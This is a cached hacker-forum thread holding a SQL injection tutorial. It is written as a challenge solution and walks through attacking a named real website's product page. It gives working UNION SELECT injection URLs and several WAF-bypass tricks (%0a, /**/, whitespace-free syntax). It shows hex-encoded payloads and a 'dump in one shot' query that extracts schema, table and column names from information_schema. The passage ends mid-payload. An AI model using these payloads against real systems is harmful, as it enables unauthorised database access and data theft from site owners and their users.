<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><script src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/bmi.js" language="javascript"></script><!-- base href="http://www.hackforums.net/showthread.php?tid=3487536" --></head><body><div style="background:#fff;border:1px solid #999;margin:-1px -1px 0;padding:0;"><div style="background:#ddd;border:1px solid #999;color:#000;font:13px arial,sans-serif;font-weight:normal;margin:12px;padding:8px;text-align:left">This is Google's cache of <a href="http://www.hackforums.net/showthread.php?tid=3487536" style="text-decoration:underline;color:#00c">http://www.hackforums.net/showthread.php?tid=3487536</a>. It is a snapshot of the page as it appeared on 1 Apr 2014 10:39:59 GMT. The <a href="http://www.hackforums.net/showthread.php?tid=3487536" style="text-decoration:underline;color:#00c">current page</a> could have changed in the meantime. <a href="http://support.google.com/websearch/bin/answer.py?hl=en&amp;p=cached&amp;answer=1687222" style="text-decoration:underline;color:#00c">Learn more</a><br>Tip: To quickly find your search term on this page, press <b>Ctrl+F</b> or <b>⌘-F</b> (Mac) and use the find bar.<br><br><div style="float:right"><a href="http://webcache.googleusercontent.com/search?q=cache:1uNYTW8ylNsJ:www.hackforums.net/showthread.php%3Ftid%3D3487536&amp;hl=en&amp;gl=in&amp;strip=1" style="text-decoration:underline;color:#00c">Text-only version</a></div><div>&nbsp;</div></div></div><div style="position:relative"><title>[SQLi Tutorial] playing with "dump in one shot" syntax - part #1 - Page 1</title> <meta name="description" content="SQL Injection Attacks-[SQLi Tutorial] playing with &quot;dump in one shot&quot; syntax - part #1"><link rel="canonical" href="http://www.hackforums.net/showthread.php?tid=3487536"><meta http-equiv="X-UA-Compatible" content="IE=8"><link rel="alternate" type="application/rss+xml" title="Latest Threads (RSS 2.0)" href="http://www.hackforums.net/syndication.php"><link rel="alternate" type="application/atom+xml" title="Latest Threads (Atom 1.0)" href="http://www.hackforums.net/syndication.php?type=atom1.0"><link rel="image_src" href="http://x.hackforums.net/images/avatars/Hardstyle2.png"><link rel="apple-touch-icon" href="http://x.hackforums.net/apple-touch-icon-precomposed.png"><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="Content-Script-Type" content="text/javascript"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/prototype.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/general.js"></script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/popup_menu.js"></script> <link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/global.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/star_ratings.css"><link type="text/css" rel="stylesheet" href="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/showthread.css"><script type="text/javascript"><!--
	var cookieDomain = ".hackforums.net";
	var cookiePath = "/";
	var cookiePrefix = "";
	var deleteevent_confirm = "Are you sure you want to delete this event?";
	var removeattach_confirm = "Are you sure you want to remove the selected attachment from this post?";
	var loading_text = 'Loading. <br />Please Wait..';
	var saving_changes = 'Saving changes..';
	var use_xmlhttprequest = "1";
	var my_post_key = "f54c7ca2b9f607627cb9306cf37f1b0f";
	var imagepath = "http://x.hackforums.net/images/modern_bl";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/tabcontent.js">/***********************************************
* Tab Content script v2.2- copyright Dynamic Drive DHTML code library (www.dynamicdrive.com)
* This notice MUST stay intact for legal use
* Visit Dynamic Drive at http://www.dynamicdrive.com/ for full source code
***********************************************/
</script> <!--//--><script type="text/javascript"><!--
	var quickdelete_confirm = "Are you sure you want to delete this post?";
// -->
</script> <script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/thread.js"></script> <!--//--><div id="container"><div class="largetext">Welcome to HackForums.net<span class="smalltext float_right"><strong>Current time:</strong> 04-01-2014, 02:39 AM</span></div><a name="top" id="top"></a><div id="header"><div class="logo"><a href="http://www.hackforums.net/aprilfools.php"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/logo_bl.gif" alt="Hack Forums" title="Hack Forums"></a></div><div class="menu"><ul><li><a href="http://www.hackforums.net/" class="navButton">Home</a></li> <li><a href="http://www.hackforums.net/upgrade.php" class="navButton">Upgrade</a></li> <li><a href="http://www.hackforums.net/search.php" class="navButton">Search</a></li> <li><a href="http://www.hackforums.net/memberlist.php" class="navButton">Members</a></li> <li><a href="http://www.hackforums.net/extras.php" class="navButton">Extras</a></li> <li><a href="http://www.hackforums.net/misc.php?action=help" class="navButton">Help</a></li> <li><a href="http://twitter.com/hackforumsnet" class="navButton">Follow</a></li> <li><a href="http://www.hackforums.net/contact.php" class="navButton">Contact</a></li></ul></div><hr class="hidden"><div id="panel"><span id="quick_login">Hello There, Guest! (<a href="http://www.hackforums.net/member.php?action=login">Login</a> — <a href="http://www.hackforums.net/member.php?action=register">Register</a>)</span></div></div><br><div class="pm_alert"><span style="color:red;">ALERT:</span>
 We have detected unusual activity with login IPs to your acccount. Your
 posting privileges have been suspended until we can verify that your 
account is not stolen. To have the suspension removed please go to this 
page: <a href="http://hackforums.net/accountrecovery.php" title="account recovery">http://hackforums.net/accountrecovery.php</a>. Please be patient as account recovery can take up to 48 hours.</div><hr class="hidden"><br class="clear"><div id="content"><div class="navigation"><a href="http://www.hackforums.net/index.php">Hack Forums</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=45">Hacks, Exploits, and Various Discussions</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=43">Website and Forum Hacking</a> / <a href="http://www.hackforums.net/forumdisplay.php?fid=103">SQL Injection Attacks</a> / <span class="active">[SQLi Tutorial] playing with "dump in one shot" syntax - part #1</span></div><br><div class="quick_keys"><div class="float_left"><div class="pagination"><span class="pages">Pages (7):</span> <span class="pagination_current">1</span> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=2" class="pagination_page">2</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=3" class="pagination_page">3</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=4" class="pagination_page">4</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=5" class="pagination_page">5</a> ... <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=7" class="pagination_last">7</a> <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;page=2" class="pagination_next">Next »</a></div></div><div class="float_right" style="padding: 5px 2px;"><a href="http://www.hackforums.net/newreply.php?tid=3487536" class="bitButton" rel="nofollow" title="Post Reply">New Reply</a> </div><div style="margin-top: 6px; padding-right: 10px;" class="float_right"><script type="text/javascript" src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/rating.js"></script><div id="success_rating_3487536" style="float: left; padding-top: 2px; padding-right: 10px;">&nbsp;</div><strong style="float: left; padding-right: 10px;">Thread Rating:</strong><div class="inline_rating"><ul class="star_rating star_rating_notrated" id="rating_thread_3487536"><li style="width: 0%" class="current_rating" id="current_rating_3487536">0 Votes - 0 Average</li> <li><a class="one_star" title="1 star out of 5" href="http://www.hackforums.net/ratethread.php?tid=3487536&amp;rating=1&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">1</a></li> <li><a class="two_stars" title="2 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3487536&amp;rating=2&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">2</a></li> <li><a class="three_stars" title="3 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3487536&amp;rating=3&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">3</a></li> <li><a class="four_stars" title="4 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3487536&amp;rating=4&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">4</a></li> <li><a class="five_stars" title="5 stars out of 5" href="http://www.hackforums.net/ratethread.php?tid=3487536&amp;rating=5&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" rel="nofollow">5</a></li></ul></div></div><!--//--><table class="tborder" style="clear: both; border-bottom-width: 0;" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="thead" colspan="2"><div class="float_right"><a href="#top" id="thread_options_3487536" class="smalltext"><strong>Thread Options</strong></a><div id="thread_options_3487536_popup" class="popup_menu" style="display: none;"><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/printthread.php?tid=3487536" class="popup_item">View a Printable Version</a></div><div class="popup_item_container thread_options"><a href="http://www.hackforums.net/usercp2.php?action=addsubscription&amp;tid=3487536&amp;my_post_key=f54c7ca2b9f607627cb9306cf37f1b0f" class="popup_item" rel="nofollow">Subscribe to this thread</a></div></div></div><script type="text/javascript"><!--
    new PopupMenu("thread_options_3487536");
// -->
</script><div><strong>[SQLi Tutorial] playing with "dump in one shot" syntax - part #1</strong></div></td></tr></tbody></table><div id="posts"><!--//--><a name="pid32700142" id="pid32700142"></a><table class="tborder" style="border-top-width: 0; " id="post_32700142" border="0" cellpadding="4" cellspacing="1"><tbody><tr><td class="tcat"><div class="float_left smalltext">05-18-2013, 05:27 AM <span id="edited_by_32700142"><span class="smalltext">(This post was last modified: 10-12-2013 08:30 AM by <a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543">ajkaro</a>.)</span> </span></div><div style="float: right; width: auto; vertical-align: top"><span class="smalltext"><strong>Post: <a href="http://www.hackforums.net/showthread.php?tid=3487536&amp;pid=32700142#pid32700142">#1</a></strong></span></div></td></tr><tr><td class="trow1 "><table style="width: 100%;" border="0" cellpadding="0" cellspacing="0"><tbody><tr><td class="post_avatar" style="padding-right: 10px;" width="1"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/avatar_949543.png" alt="" height="100" width="100"></a></td><td class="post_author"><strong><span class="largetext"><a href="http://www.hackforums.net/member.php?action=profile&amp;uid=949543"><span class="group29">ajkaro</span></a></span></strong> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/buddy_offline.gif" title="Offline" alt="Offline"><br><span class="smalltext">Ub3r Member<br><span class="userstars"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/starub3r2.png" alt="*" border="0"><br></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/ub3r.png" alt="HF Ub3r" title="HF Ub3r"> </span></td><td class="smalltext post_author_info" width="165">Prestige: 138<br>Posts: 2,183<br>Joined: Aug 2011<br>Reputation: <a href="http://www.hackforums.net/reputation.php?uid=949543"><strong class="reputation_positive">222</strong></a><br><span style="white-space:normal; width: 100%;"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blue_diamond.png" alt="Sapphire of Ub3r" title="Sapphire of Ub3r"></span></td></tr></tbody></table></td></tr><tr><td class="trow2 post_content "><div class="post_body" id="pid_32700142">As
 I usually open challenges for people willing to sharpen their skills 
and learn new stuff here is an explanation how to solve my challenge <span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #32CD32;">#45</span></span></span> <a href="http://www.hackforums.net/showthread.php?tid=3470469" target="_blank">http://www.hackforums.net/showthread.php?tid=3470469</a> <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blackhat.gif" style="vertical-align: middle;" alt="Black Hat" title="Black Hat" border="0"><br><br><span style="color: #FFA500;">Because intention of this tutorial is to learn from it tutorial will be long and detailed. Be patient while reading :)</span><br><br>As challenge required use of "<span style="color: #32CD32;">dump in one shot</span>" syntax we will see how to use it.<br><br><span style="font-weight: bold;">Challenge #45 task was:</span><br><span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span> - display version with your name<br><span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> - display count how many column names start with characters <span style="color: #FFA500;">id_</span><br><span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> - display list of columns (<span style="color: #FFA500;">with their database and table name</span>) where column names start with characters <span style="color: #FFA500;">id_</span><br><br>Based on that we already know we will have to concatenate three parts (A, B and C) using function <span style="color: #FFD700;">concat()</span> so our command will be something like<br><br>concat(<span style="color: #FFD700;">A</span>, <span style="color: #32CD32;">B</span>, <span style="color: #00BFFF;">C</span>)<br><br>For easier reading we will build our command step by step (see explanation for parts <span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span>, <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> and <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> bellow). Because our syntax will be quite long and maybe complex for someone I will write it like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;A,<br>&nbsp;&nbsp;&nbsp;&nbsp;B,<br>&nbsp;&nbsp;&nbsp;&nbsp;C<br>&nbsp;&nbsp;)</code></div></div><br>We will step by step replace <span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span>, <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> and <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> parts with our commands.<br><br>Finding columns count (23) is easy.<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFD700;">part A</span></span></span><br><br>Let's try <span style="color: #FFD700;">union select </span>command with our 23 columns:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION SELECT 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -</code></div></div><br>and we get an error:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/b3bf2f81d1b381fd52cc8ae0729f1f44.jpg" alt="[Image: b3bf2f81d1b381fd52cc8ae0729f1f44.jpg]" border="0"><br><br>So we know there is a WAF protecting site. Nice. After some trying (there is no other recipe) we can conclude command <span style="color: #FFD700;">select </span>is protected by WAF and we can bypass it with adding <span style="color: #32CD32;">%0a</span> to command <span style="color: #FFD700;">select </span>like<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -</code></div></div><br>If you are like me then you will seek for other ways to bypass WAF and another way for example is adding <span style="color: #32CD32;">/**/</span> like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION/**/SELECT 
1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -</code></div></div>Let's us remember how to bypass WAF if some other commands we will use later will be protected too.<br><br>Now our <span style="color: #FFD700;">union select</span>
 command is working, we bypassed WAF. But there is no vulnerable column 
visible on the screen. So we will have to search for it in source code. 
But wait. If we are carefully enough we can see vulnerable column 4 is 
already visible in page title:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/bdda8db5c5c85411fa1573a0806b20b1.jpg" alt="[Image: bdda8db5c5c85411fa1573a0806b20b1.jpg]" border="0"><br><br>If you are not sure that number 4 is our column 4 from our injection modify command like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,4444,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -</code></div></div>and check out title of the web page again.<br><br>So we know vulnerable column is in html tag <span style="color: #32CD32;">&lt;title&gt;</span>
 so we will have to modify it to make vulnerable column visible on web 
page and not only at page title. Let's see how it looks in source code 
of web page (click with right mouse button on page and select option 
View Page Source):<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/3a26916e264e65f49ffd2fb6dd42603f.jpg" alt="[Image: 3a26916e264e65f49ffd2fb6dd42603f.jpg]" border="0"><br><br>We will modify html code <span style="color: #32CD32;">to take our column 4 out</span> from <span style="color: #32CD32;">&lt;title&gt;</span> tag so it became visible. We will use <span style="color: #32CD32;">&lt;/TITLE&gt;</span> to close title tag and after it we will add command version() and our name. After our name will will reopen <span style="color: #32CD32;">&lt;TITLE&gt;</span> part again so text added automatically by site "<span style="font-style: italic;">- plastivan - les remplissages et alleges</span>" will be visible again in title and not on web page. So concat for part <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span></span> will looks like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/TITLE&gt;,version(), :: ajkaro (or your name),&lt;TITLE&gt;,<br>&nbsp;&nbsp;&nbsp;&nbsp;B,<br>&nbsp;&nbsp;&nbsp;&nbsp;C<br>&nbsp;&nbsp;)</code></div></div><br>All parts except version() should be converted to hex so working command will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a20616a6b61726f, 
0x3c5449544c453e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23-- -</code></div></div><br>and we can nicely see version with our name on web page.<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/7d8f7f9154f39ddd081ddf420d0462cc.jpg" alt="[Image: 7d8f7f9154f39ddd081ddf420d0462cc.jpg]" border="0"><br><br>OK. In step <span style="font-weight: bold;"><span style="color: #FFD700;">A</span></span> we made everything ready to display data for other parts of the challenge (<span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> and <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span>) to the screen. All those data can not be visible in the title of the web page, that is why we need that part.<br><br>If you need addition explanation for <span style="color: #FFA500;">manipulating HTML code</span> read tutorials:<br>ajkaro: <a href="http://www.hackforums.net/showthread.php?tid=2798495" target="_blank">http://www.hackforums.net/showthread.php?tid=2798495</a><br>benzi: <a href="http://www.hackforums.net/showthread.php?tid=2646138" target="_blank">http://www.hackforums.net/showthread.php?tid=2646138</a><br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #32CD32;">part B</span></span></span><br><br>In part <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> we need number of columns starting with <span style="color: #FFD700;">id_</span><br><br>We will use searching. See my tutorial about it: <a href="http://www.hackforums.net/showthread.php?tid=2900495" target="_blank">http://www.hackforums.net/showthread.php?tid=2900495</a><br><br>We will be searching in columns like:<br><span style="color: #FFD700;">from information_schema.columns where column_name like id_%</span><br><br>Let's start part <span style="font-weight: bold;"><span style="color: #32CD32;">B </span></span>with
 &lt;BR&gt; for new line following by some label text and command 
count(*). After those modification our previous concat command is now:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/TITLE&gt;,version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;,number of columns starting with id_ is, count(*),&lt;TITLE&gt;,<br>&nbsp;&nbsp;&nbsp;&nbsp;C<br>&nbsp;&nbsp;)</code></div></div><br>We will add searching part <span style="color: #FFD700;">from information_schema.columns where column_name like id_%</span> (id_% must be converted to hex first) to the end of our command like:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a20616a6b61726f, 
0x3c5449544c453e, 
count(*)),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from 
information_schema.columns where column_name like 0x69645f25-- -</code></div></div><br>What we get? Error :(<br><br>Aha, some other words in our command are WAF protected. After some trying we can conclude WAF protected commands are <span style="color: #FFD700;">where </span>and <span style="color: #FFD700;">like</span>. As we already know how to bypass WAF we will simply add <span style="color: #32CD32;">%0a</span> to them:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a20616a6b61726f, 
0x3c42523e,0x6e756d626572206f6620636f6c756d6e73207374617274696e67207769746820696
​45f2069733a20,count(*), 
0x3c5449544c453e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 
from information_schema.columns %0awhere column_name %0alike 
0x69645f25-- -</code></div></div><br>and we get:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/ee3d2e9696c2162b615c5131972cd0d1.jpg" alt="[Image: ee3d2e9696c2162b615c5131972cd0d1.jpg]" border="0"><br><br>We can bypass WAF also with writing our search part command without white spaces like <span style="color: #FFD700;">from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f73​6368656d61)and(column_name)like(0x69645f25)</span>. Here is complete command:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a20616a6b61726f, 
0x3c42523e,0x6e756d626572206f6620636f6c756d6e73207374617274696e67207769746820696
​
45f2069733a20,count(*),&nbsp;&nbsp;0x3c5449544c453e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23
 
from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f73
​6368656d61)and(column_name)like(0x69645f25)--</code></div></div>Here we added another part to search only for column names excluding <span style="color: #FFD700;">information_schema</span> database. Our result is <span style="font-size: medium;"><span style="font-weight: bold;"><span style="color: #32CD32;">32</span></span></span> column names are starting with <span style="color: #32CD32;">id_</span><br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #00BFFF;">part C</span></span></span><br><br>In part <span style="font-weight: bold;"><span style="color: #00BFFF;">C</span></span> we have to display list of columns (with their database and table name) where column names start with characters <span style="color: #32CD32;">id_</span> In previous step we count them, now it is time to display them.<br><br>Let's try with regular group_concat command: <span style="color: #FFD700;">group_concat(table_schema, '--&gt;', table_name, '--&gt;', column_name) </span><br><br>Our concat command we are building up step to step will be:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>concat<br>&nbsp;&nbsp;(<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;/TITLE&gt;,version(), :: ajkaro (or your name),<br>&nbsp;&nbsp;&nbsp;&nbsp;&lt;BR&gt;,number of columns starting with id_ is, count(*),<br>&nbsp;&nbsp;&nbsp;&nbsp;group_concat(table_schema, --&gt;, table_name, --&gt;, column_name,&lt;BR&gt;), &lt;TITLE&gt;<br>&nbsp;&nbsp;)</code></div></div><br>and our code after converting to hex:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>www.lesplastiquesdelouest.com/produit.php?id=55
 and 0 UNION %0aSELECT 
1,2,3,concat(0x3c2f7469746c653e,version(),0x203a3a20616a6b61726f, 
0x3c42523e,0x6e756d626572206f6620636f6c756d6e73207374617274696e67207769746820696
​45f2069733a20,count(*), 
0x3c62723e,group_concat(table_schema,0x2d2d3e,table_name,0x2d2d3e 
,column_name,0x3c62723e),0x3c5449544c453e),5,6,7,8,9,10,11,12,13,14,15,16,17,18,
​19,20,21,22,23 
from(information_schema.columns)where(table_schema!=0x696e666f726d6174696f6e5f73
​6368656d61)and(column_name)like(0x69645f25)--</code></div></div><br>and we get:<br><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/b0605c5b6ae70821f4d9c38cc3434f99.jpg" alt="[Image: b0605c5b6ae70821f4d9c38cc3434f99.jpg]" border="0"><br><br>Challenge solved :)<br><br><span style="font-weight: bold;"><span style="color: #FF0000;">But wait. </span></span><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/confused.gif" style="vertical-align: middle;" alt="Confused" title="Confused" border="0"><img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/blink.gif" style="vertical-align: middle;" alt="Blink" title="Blink" border="0"> There are only 8 column names starting with <span style="color: #32CD32;">id_</span> in our list on picture and we already know from step <span style="font-weight: bold;"><span style="color: #32CD32;">B</span></span> there are 32 of them. Some of them are missing. Where are they? What is wrong with our command?<br><br>Nothing is wrong with our command. <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/non.gif" style="vertical-align: middle;" alt="Non" title="Non" border="0"> Challenge was intentionally <img src="%5BSQLi%20Tutorial%5D%20playing%20with%20%27dump%20in%20one%20shot%27%20syntax%20-%20part%20%231%20-%20Page%201_files/devlish.gif" style="vertical-align: middle;" alt="Devlish" title="Devlish" border="0"> composed searching for column names starting with <span style="color: #32CD32;">id_</span> because there are many of them and because of that <span style="font-weight: bold;"><span style="color: #FF0000;">we can't use</span></span> <span style="color: #FFD700;">group_concat</span><br><br>As we all know <span style="color: #FFD700;">group_concat</span> has default limit of <span style="color: #32CD32;">1024 characters</span>
 so many times we can't see all data from some table. We can overcome 
that with getting data in chunks. But there are other methods we can 
use. One of them is:<br><br><span style="font-size: large;"><span style="font-weight: bold;"><span style="color: #FFA500;">Dump in one shot </span></span></span>(credits to denjacker)<br><br>If we want to dump all table schema names and table names with their column names we will use this syntax:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select
 (@x) from (select (@x:=0x00), (select (0) from 
(information_schema.columns) where (table_schema!='information_schema') 
and (0x00) in 
(@x:=concat(@x,'&lt;br&gt;',table_schema,'--&gt;',table_name,'--&gt;',column_name))))x)</code></div></div><br>There
 is no 1024 characters limit using this syntax. So after we modify that 
command adding our search part for column names starting with <span style="color: #32CD32;">id_</span> we get:<br><div class="codeblock"><div class="title">Code:<br></div><div class="body" dir="ltr"><code>(select(@x)from(select(@x:=0x00),(select(0)from(information_schema.columns)where
​
(table_schema!=0x696e666f726d6174696f6e5f736368656d61)and((column_name)like(0x69
​
645f25))and(0x00)in(@x:=concat(@x,0x3c62723e,table_schema,0x2d2d3e,table_name,0x
